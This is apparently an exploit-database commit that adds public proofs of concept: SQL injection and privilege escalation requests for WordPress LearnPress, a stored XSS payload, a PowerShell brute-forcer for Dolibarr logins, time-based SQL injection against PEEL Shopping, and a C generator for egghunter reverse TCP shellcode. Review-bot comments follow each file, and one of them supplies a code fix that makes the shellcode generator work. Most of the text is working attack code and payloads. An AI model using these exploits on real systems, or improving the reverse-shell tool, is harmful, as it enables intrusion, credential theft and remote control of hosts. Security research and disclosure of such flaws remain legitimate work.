DB: 2021-07-20

6 changes to exploits/shellcodes

WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
Dolibarr ERP/CRM 10.0.6 - Login Brute Force
PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection

Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
Offensive Security 2021-07-20 05:01:52 +00:00
parent 29558b9c84
commit c385c8068c
8 changed files with 448 additions and 0 deletions


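--- a/exploits/php/webapps/50137.txt
+++ b/exploits/php/webapps/50137.txt
@@ -0,0 +1,32 @@
+# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
+# Date: 07-17-2021
+# Exploit Author: nhattruong or nhattruong.blog
+# Vendor Homepage: https://thimpress.com/learnpress/
+# Software Link: https://wordpress.org/plugins/learnpress/
+# Version: < 3.2.6.8
+# References link: https://wpscan.com/vulnerability/10208
+# CVE: CVE-2020-6010
+POC:
+1. Go to url http://<host>/wp-admin
+2. Login with a cred
+3. Execute the payload
+POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: application/json, text/plain, */*
+Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 128
+Origin: http://localhost
+Connection: close
+Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145
+type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -
+# Modify current_items[] as you want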
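Review bot: The `Cookie:` line of the captured request carries the author's real WordPress auth and LearnPress session values (`wordpress_logged_in_…`, `wp_learn_press_session_…`), which are session material for that test instance and add nothing to reproduction; replace them with a placeholder such as `Cookie: <authenticated WordPress session cookies>`. The header never states which role the authenticated user needs (step 2 only says "Login with a cred"), so a defender cannot scope exposure; a line such as `# Requires: <minimum WordPress role the PoC was run with>` would fix that. The `Host:`, `Referer:` and `Origin:` lines could also use the `<host>` placeholder that step 1 already introduces instead of `localhost`.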


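--- a/exploits/php/webapps/50138.txt
+++ b/exploits/php/webapps/50138.txt
@@ -0,0 +1,18 @@
+# Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation
+# Date: 07-17-2021
+# Exploit Author: nhattruong or nhattruong.blog
+# Vendor Homepage: https://thimpress.com/learnpress/
+# Software Link: https://wordpress.org/plugins/learnpress/
+# Version: < 3.2.6.9
+# References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd
+# CVE: CVE-2020-11511
+POC:
+1. Find out your user id
+2. Login with your cred
+3. Execute the payload
+http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id>
+# Done!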
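Review bot: The advisory states neither the privilege level the account starts from nor the role it holds after the `accept-to-be-teacher` request, so a reader cannot tell whether a low-privileged account is enough or what "Privilege Escalation" amounts to here; the header should carry `# Prerequisite: <role the PoC was run with>` and step 3 should be followed by an outcome line naming the role the account ends up with. `# Version: < 3.2.6.9` next to the title's 3.2.6.8 implies 3.2.6.9 is the patched release; if the referenced wpscan entry confirms that, state it explicitly as a `# Fixed in:` line instead of leaving it to inference. `# Done!` adds nothing and can be dropped.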


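--- a/exploits/php/webapps/50139.txt
+++ b/exploits/php/webapps/50139.txt
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)
+# Date: 18/07/2021
+# Exploit Author: Vikas Srivastava
+# Vendor Homepage:
+# Software Link: https://wordpress.org/plugins/mimetic-books/
+# Version: 0.2.13
+# Category: Web Application
+# Tested on Mac
+How to Reproduce this Vulnerability:
+1. Install WordPress 5.7.2
+2. Install and activate Mimetic Books
+3. Navigate to Settings >> Mimetic Books API and enter the XSS payload into the Default Publisher ID input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: "><script>alert(document.cookie)</script>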
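Review bot: `# Vendor Homepage:` is left empty and `# Tested on Mac` drops the `Tested on:` key that the other entries in this commit use, so the header does not follow the house format; fill or remove the vendor line and write `# Tested on: macOS (WordPress 5.7.2)`. The advisory gives no fixed version and no vendor or CVE reference, so a defender cannot tell whether 0.2.13 is the current release; if no fix exists, say so with `# Fixed in: <none available at time of writing>`. Step 5 is hard to read and could be shortened to `5. The value is stored and the script runs again whenever the same settings page is loaded.`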


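--- a/exploits/php/webapps/50140.ps1
+++ b/exploits/php/webapps/50140.ps1
@@ -0,0 +1,68 @@
+# Exploit Title: Dolibarr ERP/CRM 10.0.6 - Login Brute Force
+# Date:2020-01-18
+# Exploit Author: Creamy Chicken Soup
+# Vendor Homepage: https://www.dolibarr.org
+# Software Link: https://sourceforge.net/projects/dolibarr/
+# Version: 10.0.6
+# Tested on: Windows 10 - 64bit
+# CVE: CVE-2020-7995
+function brute($url,$username,$passwd){
+try{
+$WebResponse = Invoke-WebRequest $url
+$a=$WebResponse.Forms.fields
+$fields=@{"token"=$a.token ;"loginfunction"=$a.loginfunction;"username"=$username;"password"=$passwd}
+$WebResponse1 = Invoke-WebRequest -Uri $url -Method Post -Body $fields
+if($WebResponse1.Forms.Id -ne "login"){
+Write-Host "username password is match"
+Write-Warning "user: $username ,passwoed: $passwd"
+return $true
+}
+}catch{
+Write-Warning "Something Wrong!"
+}
+}
+function fileinput($filepath,$url){
+try{
+Write-Host "Target: $url"
+$fp=Get-Content -Path $filepath
+foreach($line in $fp){
+$s=$line -split ':'
+$username=$s[0]
+$passwd=$s[1]
+Write-Host "[+] Check $username : $passwd"
+$bf=brute $url $username $passwd
+if($bf -eq $True){
+break
+}
+}
+}catch{
+Write-Warning "File is error"
+}
+}
+$textart=@'
+____ ____ _____ ____ _ ___ _ ____ _ _ ____ _ __ _____ _ ____ ____ _ ____
+/ _\/ __\/ __// _ \/ \__/|\ \/// _\/ \ /|/ \/ _\/ |/ // __// \ /|/ ___\/ _ \/ \ /\/ __\
+| / | \/|| \ | / \|| |\/|| \ / | / | |_||| || / | / | \ | |\ ||| \| / \|| | ||| \/|
+| \__| /| /_ | |-||| | || / / | \__| | ||| || \_ | \ | /_ | | \||\___ || \_/|| \_/|| __/
+\____/\_/\_\\____\\_/ \|\_/ \|/_/ \____/\_/ \|\_/\____/\_|\_\\____\\_/ \|\____/\____/\____/\_/
+'@
+Write-Host $textart
+Write-Host @'
+Exploit Title: DOLIBARR ERP/CRM - Brute Force Vulnerability
+Date: 2020-01-18
+Exploit Author: CreamyChickenSoup
+Vendor Homepage: https://www.dolibarr.org
+Version: 10.0.6
+CVE: CVE-2020-7995
+Vulnerable Page : http://localhost/htdocs/index.php?mainmenu=home
+Twitter: @creamychickens1
+cve submited:Tufan Gungor
+'@
+$url=Read-Host "Enter Url:"
+$filepath=Read-Host "Enter FilePAth: (File content like : user:pass)"
+fileinput $filepath $url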
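Review bot: The `catch` in `brute` reports every exception as `Something Wrong!` and returns nothing, so a transport error or an unexpected response shape is indistinguishable from a wrong guess and `fileinput` silently moves on; surface the cause with `Write-Warning "Request failed: $($_.Exception.Message)"` so a reader of the output can tell the two apart. The success line has a typo, `passwoed: $passwd` should read `password: $passwd`. `$s=$line -split ':'` also discards anything after a second colon in a `user:pass` line, which `$passwd=$s[1]` then never sees; `$s=$line -split ':',2` keeps the line intact. The `Exploit Title` block echoed at runtime repeats the header and could be reduced to the target and version lines.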


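--- a/exploits/php/webapps/50142.txt
+++ b/exploits/php/webapps/50142.txt
@@ -0,0 +1,93 @@
+# Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
+# Date: 2021-07-10
+# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
+# Vendor Homepage: https://www.peel.fr
+# Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
+# Version: prior to 9.4.0
+# Tested on: Windows 10, XAMPP
+# Reference: https://github.com/advisto/peel-shopping/issues/3
+################
+# Description #
+################
+# PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. Public user/guest (unauthenticated) can inject malicious SQL query in order to affect the execution of predefined SQL commands via the "id" parameter on the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon successful of SQL injection attack, attacker can read sensitive data from the database or modify database data.
+#####################
+# PoC of detection #
+#####################
+1) Assumed peel-shopping_9_4_0 out of box installation database name is peel. This query will check if database() name like hex(%peel%) - it will delay for 7 seconds before redirect to homepage (http://localhost/peel-shopping_9_4_0/) that indicates TRUE SQL statement which mean the database name like "peel".
+PoC #1) param id - time-based SQLi
+Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
+Request: The response duration = 418 bytes | 7,719 millis
+========
+GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/peel-shopping_9_4_0/
+DNT: 1
+Connection: close
+Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Cache-Control: max-age=0
+---
+2) Assumed the web is using MariaDB database server - check if db_version like hex(%MariaDB%), it will delay for 5 seconds if TRUE.
+PoC #2) param id - time-based SQLi
+Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
+Request: The response duration = 418 bytes | 5,112 millis
+========
+GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/peel-shopping_9_4_0/
+DNT: 1
+Connection: close
+Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Cache-Control: max-age=0
+---
+3) By default, the database have a table name = peel_produits. This query will check if table_name peel_produits is exist, it will delay for 10 seconds if TRUE, else will redirect to homepage instantly.
+PoC #3) param id - time-based SQLi
+Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
+Request: The response duration = 418 bytes | 10,140 millis
+========
+GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/peel-shopping_9_4_0/
+DNT: 1
+Connection: close
+Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Cache-Control: max-age=0
+---
+# For more explaination, you can refer to the github issue on peel-shopping via https://github.com/advisto/peel-shopping/issues/3.
+# The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1
+# The vendor has released the latest patched version on 9.4.0.1 that is available for download from sourceforge.net[https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download]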
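Review bot: The version statements contradict each other: the title and `# Version: prior to 9.4.0` place 9.3.0 and earlier in scope, the closing notes say `The affected version is prior to 9.4.0. Now it is fixed on version 9.4.0.1`, and every captured request targets a `/peel-shopping_9_4_0/` install, so a reader cannot tell whether 9.4.0 itself is affected. State one affected range and one fixed version in the header, e.g. `# Version: <affected range per the vendor issue>` and `# Fixed in: 9.4.0.1`, and make the request paths match the version named in the title. The `Cookie:` lines repeat the same session values three times and are not needed for an unauthenticated request; a single `Cookie: <none required>` placeholder is clearer. `explaination` in the closing note should be `explanation`.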


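--- a/PLACEHOLDER_PATH_exploits_index.csv
+++ b/PLACEHOLDER_PATH_exploits_index.csv
@@ -44270,3 +44270,8 @@ id,file,description,date,author,type,platform,port
 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,
 50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",2021-07-16,Photubias,webapps,java,
 50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",2021-07-16,"Metin Yunus Kandemir",webapps,hardware,
+50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",2021-07-19,nhattruong,webapps,php,
+50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",2021-07-19,nhattruong,webapps,php,
+50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",2021-07-19,"Vikas Srivastava",webapps,php,
+50140,exploits/php/webapps/50140.ps1,"Dolibarr ERP/CRM 10.0.6 - Login Brute Force",2021-07-19,"Creamy Chicken Soup",webapps,php,
+50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",2021-07-19,faisalfs10x,webapps,php,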



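--- a/PLACEHOLDER_PATH_shellcodes_index.csv
+++ b/PLACEHOLDER_PATH_shellcodes_index.csv
@@ -1040,3 +1040,4 @@ id,file,description,date,author,type,platform
 49976,shellcodes/linux_x86/49976.c,"Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)",2021-06-10,d7x,shellcode,linux_x86
 50124,shellcodes/linux_x86/50124.c,"Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes)",2021-07-13,d7x,shellcode,linux_x86
 50125,shellcodes/linux_x86/50125.c,"Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes)",2021-07-13,d7x,shellcode,linux_x86
+50141,shellcodes/linux_x86/50141.c,"Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode",2021-07-19,d7x,shellcode,linux_x86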


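--- a/shellcodes/linux_x86/50141.c
+++ b/shellcodes/linux_x86/50141.c
@@ -0,0 +1,214 @@
+# Exploit Title: Linux/x86 - Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode
+# Date: 18/07/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+/***
+Linux/x86 - Egghunter Reverse TCP Shell Shellcode Generator with dynamic IP and port Shellcode
+Author: d7x
+https://d7x.promiselabs.net/
+https://www.promiselabs.net/
+***/
+/*
+Egghunter payloads from skape modified to work on a modern up to date architecture
+For detailed information on the egghunter payloads and egghunter research refer to the original whitepaper by skape:
+Safely Searching Process Virtual Address Space http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
+Example usage of egghunters https://www.fuzzysecurity.com/tutorials/expDev/4.html
+*/
+/* Usage: $ gcc -fno-stack-protector -z execstack -o egghunter egghunter_shellcode.c
+$ ./egghunter 2 3d7xC0D3 192.168.1.137 6666 # This will output AND execute the egghunter! (if you get a seg fault/core dumped error either your shellcode output contains null bytes or you have no idea what you are doing)
+*/
+#include <stdio.h>
+#include <string.h>
+#include <netdb.h>
+void PrintShellcode(unsigned char* s);
+void change_shellcode_bytes(unsigned char shellcode[], int offset, int n, unsigned char new[]);
+unsigned char* ConvertStrToHex(unsigned char* s);
+unsigned char egghunter[][200] = { \
+{"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"}, // access method - 39 bytes
+{"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"}, //access revisited (fixed) - 37 bytes
+{"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"} //sigaction method (fixed) - 32 bytes
+};
+/* unsigned char egghunter[] = \
+"\x31\xC9\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (fixed) - 32 bytes
+//"\x66\x81\xC9\xFF\x0F\x41\x6A\x43\x58\xCD\x80\x3C\xF2\x74\xF1\xB8\x90\x50\x90\x50\x89\xCF\xAF\x75\xEC\xAF\x75\xE9\xFF\xE7"; //sigaction method (original version by skape - 30 bytes)
+//"\x31\xC9\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (fixed) - 37 bytes
+//"\x31\xD2\x66\x81\xCA\xFF\x0F\x42\x8D\x5A\x04\x6A\x21\x58\xCD\x80\x3C\xF2\x74\xEE\xB8\x90\x50\x90\x50\x89\xD7\xAF\x75\xE9\xAF\x75\xE6\xFF\xE7"; //access revisited (original version by skape) - 35 bytes
+//"\xBB\x90\x50\x90\x50\x31\xC9\xF7\xE1\x66\x81\xCA\xFF\x0F\x42\x60\x8D\x5A\x04\xB0\x21\xCD\x80\x3C\xF2\x61\x74\xED\x39\x1A\x75\xEE\x39\x5A\x04\x75\xE9\xFF\xE2"; // access method - 39 bytes
+*/
+/* Reverse TCP Shell:
+egg \x90\x50\x90\x50\x90\x50\x90\x50
+127.1.1.1 4444 */
+unsigned char shellcode[] = \
+"\x90\x50\x90\x50\x90\x50\x90\x50\x31\xc0\x31\xdb\xb0\x66\xb3\x01\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\xb3\x03\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x31\xc9\x31\xc0\xb0\x3f\x89\xf3\xcd\x80\xfe\xc1\x66\x83\xf9\x02\x7e\xf0\x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80"; //IP address at eggsize + 26th byte; Port at eggsize + 32nd byte
+int eggsize = 4; //default
+main(int argc, char *argv[])
+{
+if (argc < 2)
+{
+printf("Usage: %s <egghunter> [egg] [IP] [Port]", argv[0]);
+printf("\nExample: %s 0 0x9050 127.1.1 4444\n"
+"%s 1 AABB 127.1.1.1 4444\n"
+"%s 2 AABBCCDD 127.1.1.1 4444\n"
+"%s 2 3d7xC0D3 127.1.1.1 4444\n", argv[0], argv[0], argv[0], argv[0]);
+printf("\n\nDefault egg: \\x90\\x50\\x90\\x50 (push eax, nop, push eax, nop)"
+"\nDefault shellcode IP and port 127.1.1.1:4444");
+printf("\n\nAvailable egghunters:"
+"\n0 - access method (39 bytes), requires executable egg"
+"\n1 - access revisited (37 bytes)"
+"\n2 - sigaction (32 bytes)\n"
+);
+return 0;
+}
+int eh = atoi((char *)argv[1]);
+if (eh < 0 || eh > 2)
+{
+printf("Invalid Egghunter: %d!\n", eh);
+return 0;
+}
+if (argc > 2)
+{
+if (argv[2][0] == '0' && argv[2][1] == 'x') argv[2] += 2;
+if (strlen(argv[2]) != 4 && strlen(argv[2]) != 8)
+{
+printf("Egg has to be at least 4 or exactly 8 bytes!"
+"\nExample eggs: 9050, 9060, C0D3,"
+"\n d7xC0D3D, 3d7xC0D3, 3d7xC0D3, 7d7xC0D3"
+"\n"
+);
+return 0;
+}
+int i;
+for (i = 0; i < strlen(argv[2]); i+=2)
+if (argv[2][i] == '0' && argv[2][i+1] == '0')
+{
+printf("No null bytes!\n");
+return 0;
+}
+}
+/* change egg if provided */
+int eh_offset = 1; // default offset for access method (39 bytes)
+if (eh == 1) eh_offset = 23; // offset for access revisited (37 bytes)
+else if (eh ==2) eh_offset = 18; // offset for sigaction (32 bytes)
+if (argc > 2) {
+unsigned char* new_egg = argv[2], *s, *tmp;
+printf("Changing egg to %s...\n", new_egg);
+s = ConvertStrToHex(argv[2]);
+tmp = s;
+//fill buffer - 4 bytes of [egg], then concatenate additional 4 bytes of [egg] (8 bytes)
+strcat(tmp, s);
+if (strlen(argv[2]) == 4)
+strcat(tmp, tmp);
+//PrintShellcode(s);
+change_shellcode_bytes(egghunter[eh], eh_offset, eh_offset+3, s);
+change_shellcode_bytes(shellcode, 0, 7, tmp);
+}
+printf("Egghunter %d, size %d\n", eh, strlen(egghunter[eh] ) );
+printf("Egghunter shellcode: \n");
+PrintShellcode(egghunter[eh]);
+printf("\nReverse TCP Shellcode (%d bytes): \n", strlen(shellcode));
+// change shellcode IP address
+unsigned char *s2 = shellcode;
+if (argc > 3)
+{
+printf("%s\n", argv[3]);
+// convert IP address to binary representation and store in ipaddr.sin_addr.s_addr
+struct sockaddr_in ipaddr;
+inet_aton(argv[3], &ipaddr.sin_addr.s_addr);
+int i = eggsize*2+26, a;
+int e = i+3;
+for (i, a = 0; i <= e; i++, a+=8)
+{
+s2[i] = (ipaddr.sin_addr.s_addr >> a) & 0xff ;
+printf("Byte %d: %.02x\n", i, s2[i]);
+}
+}
+// change shellcode Port
+int port = 4444; //0x115c - default
+if (argc > 4)
+{
+port = atoi(argv[4]);
+unsigned int p1 = (port >> 8) & 0xff;
+unsigned int p2 = port & 0xff;
+s2[eggsize*2+32] = (unsigned char){p1};
+s2[eggsize*2+33] = (unsigned char){p2};
+}
+printf("Port %d\n", port);
+PrintShellcode(s2);
+printf("\n");
+int (*ret)() = (int(*)())egghunter[eh];
+ret();
+}
+void change_shellcode_bytes(unsigned char* shellcode_n, int offset, int n, unsigned char* new)
+{
+int i, a;
+for (i = offset, a = 0; i <= n; i++, a++)
+shellcode_n[i] = (unsigned char) {new[a]};
+// printf("Byte %d: %.02x\n", i, shellcode_n[i]);
+}
+void PrintShellcode(unsigned char* s)
+{
+printf("\"");
+while (*s)
+printf("\\x%.02x", (unsigned int) *s++);
+printf("\"\n");
+}
+unsigned char* ConvertStrToHex(unsigned char* s)
+{
+if (s[0] == '0' && s[1] == 'x') s += 2;
+unsigned char buf[strlen(s)/2];
+buf[strlen(s)/2] = '\0';
+int len = sizeof(buf);
+size_t count;
+for (count = 0; count < len; count++) {
+sscanf(s, "%2hhx", &buf[count]);
+s += 2;
+}
+return buf;
+}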
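Review bot: `ConvertStrToHex` returns `buf`, a VLA that ceases to exist when the function returns, and `buf[strlen(s)/2] = '\0'` writes one byte past its end; `main` then calls `strcat(tmp, s)` with `tmp == s` on that same dead, undersized buffer to grow the egg to 8 bytes, so the bytes that `change_shellcode_bytes` copies into `egghunter[eh]` and `shellcode` are whatever happens to survive on the stack. Decode into a heap buffer with room for the 8-byte egg plus terminator as below, have `main` check the result for NULL, and replace the two self-`strcat` calls with a length-based copy such as `memcpy(s + len, s, len)`, since `strcat` on overlapping storage is undefined. `atoi` (and `calloc` in the fix) require `#include <stdlib.h>` and `inet_aton` requires `#include <arpa/inet.h>`; `inet_aton` should also be passed `&ipaddr.sin_addr` rather than `&ipaddr.sin_addr.s_addr`. `PrintShellcode` stops at the first NUL, so an IP or port that yields a zero byte (a constructed example: port 256 gives `p2 == 0`) prints truncated while `ret()` still runs the buffer; using `sizeof(shellcode) - 1` as the length would make the printed output match what executes.
```c
unsigned char* ConvertStrToHex(unsigned char* s)
{
    if (s[0] == '0' && s[1] == 'x') s += 2;
    size_t len = strlen((char *)s) / 2;
    /* main() only accepts 4- or 8-char eggs (2 or 4 bytes) and later doubles them to 8 bytes */
    if (len > 4) return NULL;
    unsigned char *buf = calloc(9, 1);   /* 8 egg bytes + NUL, zero-filled */
    if (buf == NULL) return NULL;
    for (size_t count = 0; count < len; count++) {
        sscanf((char *)s, "%2hhx", &buf[count]);
        s += 2;
    }
    return buf;
}
```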